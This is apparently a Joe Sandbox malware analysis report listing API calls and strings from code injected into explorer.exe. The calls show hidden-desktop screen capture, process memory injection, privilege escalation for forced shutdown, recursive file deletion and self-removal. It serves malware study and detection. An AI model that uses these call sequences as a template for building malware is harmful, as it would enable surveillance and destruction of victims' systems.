Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

GlobalLock.KERNEL32(00000000), ref: 01B6B09F
EnterCriticalSection.KERNEL32(01B73FB4,00000000,00000000), ref: 01B6B0DF

Part of subcall function 01B6AD5F: EnterCriticalSection.KERNEL32(01B73FB4,?,?,?,01B6B052,?), ref: 01B6AD7C
Part of subcall function 01B6AD5F: LeaveCriticalSection.KERNEL32(01B73FB4,?,?,?,01B6B052,?), ref: 01B6AD9D
Part of subcall function 01B6AD5F: EnterCriticalSection.KERNEL32(01B73FB4,?,?,?,?,01B6B052,?), ref: 01B6ADAE
Part of subcall function 01B6AD5F: LeaveCriticalSection.KERNEL32(01B73FB4,?,?,?,01B6B052,?), ref: 01B6AE47

LeaveCriticalSection.KERNEL32(01B73FB4,00000000,01B54A68), ref: 01B6B0F6

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

GlobalUnlock.KERNEL32(?), ref: 01B6B109

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B668E0, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

socket.WS2_32(00000000,00000002,00000000), ref: 01B668F2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 01B6691C
WSAGetLastError.WS2_32 ref: 01B66923

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01B6694F

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

#3.WS2_32(?), ref: 01B66963

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B68A29, Relevance: 7.6, APIs: 5, Instructions: 61

APIs

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

FindFirstFileW.KERNEL32(?,?,?,?), ref: 01B68A5A

Part of subcall function 01B68716: SetFileAttributesW.KERNEL32(00000080,00000080,01B6B4CD,?), ref: 01B6871F
Part of subcall function 01B68716: DeleteFileW.KERNEL32(?), ref: 01B68729

FindNextFileW.KERNEL32(00000000,?), ref: 01B68AB5
FindClose.KERNEL32(00000000), ref: 01B68AC0
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 01B68ACC
RemoveDirectoryW.KERNEL32(?), ref: 01B68AD3

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B55A01, Relevance: 7.6, APIs: 5, Instructions: 56

APIs

GetUpdateRect.USER32(?,?,?), ref: 01B55A88

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

TlsGetValue.KERNEL32 ref: 01B55A21
SaveDC.GDI32(?), ref: 01B55A51
SendMessageW.USER32(?,00000014,?,00000000), ref: 01B55A61
RestoreDC.GDI32(?,00000000), ref: 01B55A73

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B55BF6, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,01B630F6), ref: 01B55C03
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,01B630F6), ref: 01B55C0A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,01B630F6), ref: 01B55C1C

Part of subcall function 01B554A9: GetWindowInfo.USER32(?,?), ref: 01B55515
Part of subcall function 01B554A9: IntersectRect.USER32(?,?,-00000114), ref: 01B55538
Part of subcall function 01B554A9: IntersectRect.USER32(?,?,-00000114), ref: 01B5558E
Part of subcall function 01B554A9: GetDC.USER32(00000000), ref: 01B555D2
Part of subcall function 01B554A9: CreateCompatibleDC.GDI32(00000000), ref: 01B555E3
Part of subcall function 01B554A9: ReleaseDC.USER32(00000000,00000000), ref: 01B555ED
Part of subcall function 01B554A9: SelectObject.GDI32(00000000,?), ref: 01B55602
Part of subcall function 01B554A9: DeleteDC.GDI32(00000000), ref: 01B55610
Part of subcall function 01B554A9: TlsSetValue.KERNEL32(?), ref: 01B5565B
Part of subcall function 01B554A9: EqualRect.USER32(?,?), ref: 01B55675
Part of subcall function 01B554A9: SaveDC.GDI32(00000000), ref: 01B55680
Part of subcall function 01B554A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01B5569B
Part of subcall function 01B554A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 01B556BB
Part of subcall function 01B554A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 01B556CD
Part of subcall function 01B554A9: RestoreDC.GDI32(00000000,?), ref: 01B556E4
Part of subcall function 01B554A9: SaveDC.GDI32(00000000), ref: 01B55706
Part of subcall function 01B554A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01B5571C
Part of subcall function 01B554A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 01B55735
Part of subcall function 01B554A9: RestoreDC.GDI32(00000000,?), ref: 01B55743
Part of subcall function 01B554A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01B55756
Part of subcall function 01B554A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 01B55766
Part of subcall function 01B554A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 01B55778
Part of subcall function 01B554A9: TlsSetValue.KERNEL32(00000000), ref: 01B55792
Part of subcall function 01B554A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01B557B2
Part of subcall function 01B554A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 01B557CE
Part of subcall function 01B554A9: SelectObject.GDI32(00000000,?), ref: 01B557E4
Part of subcall function 01B554A9: DeleteDC.GDI32(00000000), ref: 01B557EB
Part of subcall function 01B554A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01B55813
Part of subcall function 01B554A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 01B55829

SetEvent.KERNEL32(01B72868,?,00000001), ref: 01B55C69
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 01B55C76

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5B0AD, Relevance: 7.5, APIs: 5, Instructions: 32

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 01B5B0B3
ReleaseMutex.KERNEL32(?), ref: 01B5B0E7
IsWindow.USER32(?), ref: 01B5B0EE
PostMessageW.USER32(?,00000215,00000000,?), ref: 01B5B108
SendMessageW.USER32(?,00000215,00000000,?), ref: 01B5B110

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B59009, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 01B674DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01B57194,?,?,00000104,.exe,00000000), ref: 01B674F4
Part of subcall function 01B674DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01B57194,?,?,00000104), ref: 01B67575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 01B5906B
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 01B590BB

Part of subcall function 01B68AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01B68B23
Part of subcall function 01B68AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B68B4A
Part of subcall function 01B68AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01B68B94
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01B68BC1
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?), ref: 01B68BF1
Part of subcall function 01B68AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01B68C1F
Part of subcall function 01B68AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01B68C31

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Strings

#, xrefs: 01B59093
&, xrefs: 01B590A1

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B598B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 01B674DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01B57194,?,?,00000104,.exe,00000000), ref: 01B674F4
Part of subcall function 01B674DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01B57194,?,?,00000104), ref: 01B67575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 01B5991B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 01B5996B

Part of subcall function 01B68AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01B68B23
Part of subcall function 01B68AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B68B4A
Part of subcall function 01B68AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01B68B94
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01B68BC1
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?), ref: 01B68BF1
Part of subcall function 01B68AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01B68C1F
Part of subcall function 01B68AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01B68C31

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Strings

&, xrefs: 01B5994A
#, xrefs: 01B59951

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B62828, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52

APIs

Part of subcall function 01B635C6: MultiByteToWideChar.KERNEL32(01B62884,00000000,?,01B61FF2,?,7718F8FF,01B62884,00000000,00000032,?,7718F8FF,00000000), ref: 01B635DD

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01B628A1

Strings

SOFTWARE\Microsoft, xrefs: 01B62855
C:\Users\admin\AppData\Roaming, xrefs: 01B62870, 01B62888
.dat, xrefs: 01B6289B

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5E0FB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47

APIs

GetCurrentThreadId.KERNEL32(7718F8FF), ref: 01B5E108
GetThreadDesktop.USER32(00000000), ref: 01B5E10F
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 01B5E128

Part of subcall function 01B5DD09: TlsAlloc.KERNEL32(01B72868,00000000,0000018C,00000000,00000000), ref: 01B5DD22
Part of subcall function 01B5DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 01B5DD4A
Part of subcall function 01B5DD09: CreateEventW.KERNEL32(01B72C30,00000001,00000000,?,84889912,?,00000001), ref: 01B5DD74
Part of subcall function 01B5DD09: CreateMutexW.KERNEL32(01B72C30,00000000,?,18782822,?,00000001), ref: 01B5DD97
Part of subcall function 01B5DD09: CreateFileMappingW.KERNEL32(00000000,01B72C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 01B5DDC2
Part of subcall function 01B5DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 01B5DDD8
Part of subcall function 01B5DD09: GetDC.USER32(00000000), ref: 01B5DDF5
Part of subcall function 01B5DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 01B5DE15
Part of subcall function 01B5DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 01B5DE1F
Part of subcall function 01B5DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 01B5DE32
Part of subcall function 01B5DD09: ReleaseDC.USER32(00000000,?), ref: 01B5DE56
Part of subcall function 01B5DD09: CreateMutexW.KERNEL32(01B72C30,00000000,?,1898B122,?,00000001,01B728B8,?,00000102,01B728A4,01B72E70,00000010,?,?), ref: 01B5DF00
Part of subcall function 01B5DD09: GetDC.USER32(00000000), ref: 01B5DF15
Part of subcall function 01B5DD09: CreateCompatibleDC.GDI32(00000000), ref: 01B5DF23
Part of subcall function 01B5DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 01B5DF3A
Part of subcall function 01B5DD09: SelectObject.GDI32(00000000,00000000), ref: 01B5DF4D
Part of subcall function 01B5DD09: ReleaseDC.USER32(00000000,00000001), ref: 01B5DF65

Part of subcall function 01B5DF74: DeleteObject.GDI32(00000000), ref: 01B5DF87
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5DF97
Part of subcall function 01B5DF74: TlsFree.KERNEL32(00000000,00000000,01B72868,00000000,01B5E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01B5DFA2
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5DFB0
Part of subcall function 01B5DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,01B72868,00000000,01B5E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01B5DFBA
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5DFC7
Part of subcall function 01B5DF74: SelectObject.GDI32(00000000,00000000), ref: 01B5DFE1
Part of subcall function 01B5DF74: DeleteObject.GDI32(00000000), ref: 01B5DFF2
Part of subcall function 01B5DF74: DeleteDC.GDI32(00000000), ref: 01B5DFFF
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5E010
Part of subcall function 01B5DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B5E01F
Part of subcall function 01B5DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 01B5E038

Strings

N, xrefs: 01B5E132

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B689C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathSkipRootW.SHLWAPI(?), ref: 01B689CD
GetFileAttributesW.KERNEL32(?,?,00000000,01B6D261,?,?,?,?,?), ref: 01B689F5
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,01B6D261,?,?,?,?,?), ref: 01B68A03

Strings

.exe, xrefs: 01B689C9

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B687C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 01B687D7

Part of subcall function 01B646F4: GetTickCount.KERNEL32(01B68766,?), ref: 01B646F4

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 01B68829

Strings

tmp, xrefs: 01B687ED
%s%08x, xrefs: 01B687F2

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B55ECF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathRemoveFileSpecW.SHLWAPI(01B725D0), ref: 01B55F07
PathRenameExtensionW.SHLWAPI(?,.tmp), ref: 01B55F23

Part of subcall function 01B689C2: PathSkipRootW.SHLWAPI(?), ref: 01B689CD
Part of subcall function 01B689C2: GetFileAttributesW.KERNEL32(?,?,00000000,01B6D261,?,?,?,?,?), ref: 01B689F5
Part of subcall function 01B689C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,01B6D261,?,?,?,?,?), ref: 01B68A03

Part of subcall function 01B66A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 01B66A5B
Part of subcall function 01B66A3C: GetSecurityDescriptorSacl.ADVAPI32(?,00000000,?,00000000), ref: 01B66A77
Part of subcall function 01B66A3C: SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 01B66A8E
Part of subcall function 01B66A3C: LocalFree.KERNEL32(?), ref: 01B66A9D

GetFileAttributesW.KERNEL32(01B723C8,01B725D0,01B725D0,?,?,01B56527,00000000,?,00000000,00000330,?,?,00000102), ref: 01B55F46

Part of subcall function 01B62828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01B628A1

Strings

.tmp, xrefs: 01B55F1D

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5F367, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 01B5F3CC

Part of subcall function 01B6D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 01B6D34A
Part of subcall function 01B6D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 01B6D35D
Part of subcall function 01B6D325: SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 01B6D39B
Part of subcall function 01B6D325: CharToOemW.USER32(?,?), ref: 01B6D3B7
Part of subcall function 01B6D325: CharToOemW.USER32(?,?), ref: 01B6D3C6
Part of subcall function 01B6D325: ExitProcess.KERNEL32(00000000), ref: 01B6D41C

Part of subcall function 01B5E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01B54E69,?,?,?,743C152E,00000002), ref: 01B5E97F

ExitWindowsEx.USER32(00000014,80000000), ref: 01B5F3DF

Part of subcall function 01B64A87: GetCurrentThread.KERNEL32(00000020,00000000,01B6C9A1,00000000,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64A97
Part of subcall function 01B64A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64A9E
Part of subcall function 01B64A87: OpenProcessToken.ADVAPI32(000000FF,00000020,01B6C9A1,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64AB0
Part of subcall function 01B64A87: LookupPrivilegeValueW.ADVAPI32(00000000,01B6C9A1,?), ref: 01B64AD4
Part of subcall function 01B64A87: AdjustTokenPrivileges.ADVAPI32(01B6C9A1,00000000,00000001,00000000,00000000,00000000), ref: 01B64AE9
Part of subcall function 01B64A87: GetLastError.KERNEL32 ref: 01B64AF3
Part of subcall function 01B64A87: CloseHandle.KERNEL32(01B6C9A1), ref: 01B64B02

Strings

, xrefs: 01B5F383
SeShutdownPrivilege, xrefs: 01B5F3AB

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B61E2D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 01B61E4B
PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 01B61E5A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 01B61E6E

Strings

C:\Users\admin\AppData\Roaming, xrefs: 01B61E3D, 01B61E42, 01B61E59

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B64BC2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01B61DBB,00000000,01B622ED), ref: 01B64BCF
GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,01B61DBB,00000000,01B622ED), ref: 01B64BDF

Strings

kernel32.dll, xrefs: 01B64BCA
IsWow64Process, xrefs: 01B64BD9

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6A24F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22

APIs

EnterCriticalSection.KERNEL32(01B73F24), ref: 01B6A265
SetEvent.KERNEL32(?), ref: 01B6A286
LeaveCriticalSection.KERNEL32(01B73F24), ref: 01B6A28D

Strings

3, xrefs: 01B6A256

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B60AA1, Relevance: 6.3, APIs: 4, Instructions: 303

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01B60C73
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01B60C93
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01B60CA6
GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01B60CB5

Part of subcall function 01B63346: HeapAlloc.KERNEL32(00000008,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?,?), ref: 01B63368
Part of subcall function 01B63346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?), ref: 01B63379

Part of subcall function 01B64660: CryptAcquireContextW.ADVAPI32(01B68C87,00000000,00000000,00000001,F0000040,?,01B68C87,?,00000030,?,?,?,01B691A0,01B73EC0), ref: 01B64679
Part of subcall function 01B64660: CryptCreateHash.ADVAPI32(01B68C87,00008003,00000000,00000000,00000030,?,01B68C87,?,00000030,?,?,?,01B691A0,01B73EC0), ref: 01B64691
Part of subcall function 01B64660: CryptHashData.ADVAPI32(00000030,00000010,01B68C87,00000000,?,01B68C87), ref: 01B646AD
Part of subcall function 01B64660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,01B68C87), ref: 01B646C5
Part of subcall function 01B64660: CryptDestroyHash.ADVAPI32(00000030,?,01B68C87), ref: 01B646DC
Part of subcall function 01B64660: CryptReleaseContext.ADVAPI32(01B68C87,00000000,?,01B68C87,?,00000030,?,?,?,01B691A0,01B73EC0), ref: 01B646E6

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5A088, Relevance: 6.2, APIs: 4, Instructions: 184

APIs

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 01B5A12E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 01B5A159
RegCloseKey.ADVAPI32(?), ref: 01B5A28F

Part of subcall function 01B674DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01B57194,?,?,00000104,.exe,00000000), ref: 01B674F4
Part of subcall function 01B674DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01B57194,?,?,00000104), ref: 01B67575

Part of subcall function 01B67595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,01B69E26,?,?), ref: 01B675AD

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 01B5A27C

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5A61C, Relevance: 6.2, APIs: 4, Instructions: 176

APIs

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 01B5A6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 01B5A6D5
RegCloseKey.ADVAPI32(?), ref: 01B5A80C

Part of subcall function 01B674DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01B57194,?,?,00000104,.exe,00000000), ref: 01B674F4
Part of subcall function 01B674DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01B57194,?,?,00000104), ref: 01B67575

Part of subcall function 01B67595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,01B69E26,?,?), ref: 01B675AD

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 01B5A7F9

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6B265, Relevance: 6.1, APIs: 4, Instructions: 129

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 01B6B28C

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 01B6B2E0

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 01B6B343
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 01B6B36F

Part of subcall function 01B6B3EC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01B6B437
Part of subcall function 01B6B3EC: WriteFile.KERNEL32(01B6B3D4,?,00000146,?,00000000), ref: 01B6B475
Part of subcall function 01B6B3EC: WriteFile.KERNEL32(01B6B3D4,?,00000000,?,00000000), ref: 01B6B499
Part of subcall function 01B6B3EC: FlushFileBuffers.KERNEL32(01B6B3D4), ref: 01B6B4AD
Part of subcall function 01B6B3EC: CloseHandle.KERNEL32(01B6B3D4), ref: 01B6B4B6

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B67D14, Relevance: 6.1, APIs: 4, Instructions: 94

APIs

IsBadReadPtr.KERNEL32(01B50000,?), ref: 01B67D30
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 01B67D4E
